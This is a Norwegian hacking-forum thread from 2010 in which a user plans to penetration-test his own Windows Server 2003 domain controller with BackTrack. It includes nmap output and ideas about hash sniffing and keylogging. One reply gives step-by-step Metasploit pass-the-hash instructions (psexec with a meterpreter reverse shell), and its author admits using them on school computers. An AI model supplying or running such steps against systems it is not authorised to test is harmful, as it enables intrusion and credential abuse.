Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  9 1264
Jeg er akkurat ferdig med å sette opp serveren min, og tenkte jeg nå skulle kjøre litt hardere til verks enn Microsoft Baseline Security Analyzer. (null feilmeldinger)

Jeg har tenkt til å bruke ca 4timer hver dag denne uken (man-fre) på å hacke serveren min. Et veldig uspesifisert ordvalg, men det er her jeg håper dere medfreaker kan hjelpe litt! Kom gjerne med forslag til hva jeg kan teste!

Teknisk info:
Hardware
Server 2003 R2 x64 SP2
Kjørende tjenester: AD, DHCP, DNS, Fileshare, Printer
IP: 192.168.49.50
Scope: 192.168.49.100-254
Subnetmask: 255.255.255.0
PrinterIP: 192.168.49.60
En klient

VS!
BackTrack4!

Bruker null trådløst nett her, så kommer til å koble BT4 maskinen (kommer heretter til å reffere til den klienten som BT) direkte til switchen.

Kommer til å poste fortløpende her hva jeg gjør!
Håper på gode innspill til hva jeg kan teste. Kommer til å bruke en del avoffensive-security og backtrack-linux.org for tips.
Sist endret av Meteor Freak; 28. juni 2010 kl. 08:24.
1) Jeg tror ikke det er din server du har tenkt å hacke i det hele tatt.
2) Så lenge den er oppdatert med windows update, og du ikke kjører noen andre tjenester med sikkerhets hull (for exploiting) tror jeg du kan glemme å "hacke" denne serveren.. (remotely)
3) Jeg tror ikke det er din server du har tenkt å hacke i det hele tatt.

Edit: Hva er målet med å "hacke" serveren din? Hva skal du? Hente ut informasjon? Knèele den? Utnytte internett-aksessen?
Sist endret av Nenzo; 28. juni 2010 kl. 08:51.
Trigonoceps occipita
vidarlo's Avatar
Donor
Bortkasta tid. Vit kva tenester som kjører, og vit kva versjoner som kjører, og eventuelle sikkerhetshull i dei. Med din metodikk vil du kun finne relativt gamle og uviktige hull, eller dei du tilfeldigvis tester for.

Skru av alt av tjenester du ikkje bruker, og les om dei du bruker så har du brått et sikkert oppsett.
Første dagen kommer hovedsakelig til å gå til å installere og oppdatere BT. (mye annet å gjøre) Orker ikke å kjøre live-distro i en hel uke, så da bruker jeg heller litt tid på å installere det.

Det er ikke noe enkel måte jeg kan bevise at dette faktisk er min server på. Kan jo alltids laste opp et bilde fra et eller annet, men det kan jo like godt være tatt fra et annet sted. Kan få vitner fra forumet som vet om dette til å gå god for meg, men igjen, de kan jo like godt være betalt av meg for å si det
Hensikten med det er å lære!

Jeg har jo mulighet for å installere ekstra tjenester da! Så noe må jeg vel få til etter hvert. Cane & Able må vel fungere til et eller annet.
Har hørt det skal være en måte der man kjører wireshark og snapper opp hashen en bruker sender til serveren når han logger seg på, og at man da kan sende akkurat samme hashen igjen, istedenfor passord. Noen som har hørt om det??

Tenker jeg etterhvert også skal prøve å bruke trådløst tastatur på klienten og "keylogge" dette
Queen of Blades
Jonta's Avatar
DonorCrew
Vel Nenzo, jeg tipper det ikke teller for mye, men jeg har møtt Meteor Freak IRL, og har ingen grunner til å anta at dette prosjektet er noe annet enn whitehat på egen PC.

Du må nok belage deg på en god del googling. Såvidt jeg husker er BT sin programliste delt inn i kategorier. Skaff deg et overblikk over hva de forskjellige kategoriene gjør først, for så å danne deg et bilde av når man bruker hva i hver enkelt kategori.

Eksempel: Hva er Information Gathering vs Network Mapping? DNS vs Whois? Hva gjør DNS-Ptr som ikke DNS-Walk kan?

Lykke til med læring om pen-testing.
Sist endret av Jonta; 28. juni 2010 kl. 10:13.
Sett opp serveren som en honeypot og og bekreft at vi andre kan prøve oss, så ser vi hvem som kommer seg inn og klarer å holde fortet

Prosessen må selvsagt dokumenteres i ettertid.
Sitat av Meteor Freak Vis innlegg

Jeg har jo mulighet for å installere ekstra tjenester da! Så noe må jeg vel få til etter hvert. Cane & Able må vel fungere til et eller annet.
Har hørt det skal være en måte der man kjører wireshark og snapper opp hashen en bruker sender til serveren når han logger seg på, og at man da kan sende akkurat samme hashen igjen, istedenfor passord. Noen som har hørt om det??
Vis hele sitatet...
Det du snakker om er en metode som kalles "Pass the Hash". Det dette innebærer er at du må på en eller annen måte skaffe sam-hashen på passordet til administratorbrukeren på serveren, for så å bruke denne til å logge deg inn.

Siden du bruker BT4 er dette rimelig lett siden BT4 inneholder metaslpoit. Kjapp guide på hvordan du gjør dette:

*Fyr opp metasploit. (msfconsole i terminalen/terminator)
*Skriv "use windows/smb/psexec" og trykk enter. Da loader du en exploit som lar deg misbruke dette sikkerhetshullet.
* skriv "set payload "windows/meterpreter/reverse_tcp" hvis du ikke gjør dette er det ikke noe serlig du får gjort annet enn å kunne si "hei, jeg logget meg på serveren, men kan ikke gjøre noe"
* skriv "set lhost dinip","set rhost ipadressen til serveren" og "set smbpass samhashen" og trykk enter. Hvis serveren ikke er sikret mot dette vil du komme deg rett inn. Tror serveren må være satt opp i et domene for at det skal fungere, men er usikker når det kommer til akkurat dette.

Vet at denne metoden fungerer da jeg selv gjorde akkurat dette på elevmaskinene på skolen. Alle hadde samme adminpassord...
Prøver å sniffe etter md5 hashen på nettverket, noe som ikke har gått så veldig bra. Noen tips til hvilket program jeg bør bruke??
kjørt en liten nmap

Kode

root@bt:~# nmap 192.168.49.50

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2010-06-29 09:32 CEST
Nmap scan report for 192.168.49.50
Host is up (0.000074s latency).
Not shown: 983 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1025/tcp open  NFS-or-IIS
1027/tcp open  IIS
1039/tcp open  unknown
1049/tcp open  unknown
1065/tcp open  unknown
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-term-serv
MAC Address: 40:61:86:C3:DA:C4 (Micro-star Int'l Co.)

Nmap done: 1 IP address (1 host up) scanned in 6.38 seconds
Tom for megabytes
AtXbYeA's Avatar
Mtp på at passordet sendes kryptert mellom klienter og AD via Kerberos er det lite du kan hente ut dersom du ikke har en shared key som er aktiv der og da.
Default oppdateres vel denne keyen hvert 2. eller 20. minutt fra AD mot klienter hvis jeg ikke husker feil.
Sist endret av AtXbYeA; 29. juni 2010 kl. 16:18.
Trigonoceps occipita
vidarlo's Avatar
Donor
Kvifor les du ikkje det eg skreiv over? Finn ut kva versjoner av ting som lytter på nettet, google dei, og les gjennom sikkerhetsbulletiner.

Og md5-hash på nettverket? Til å sniffe nettverkspakker kan du jo bruke wireshark, men du har jo ikkje konsept om kva du gjer på...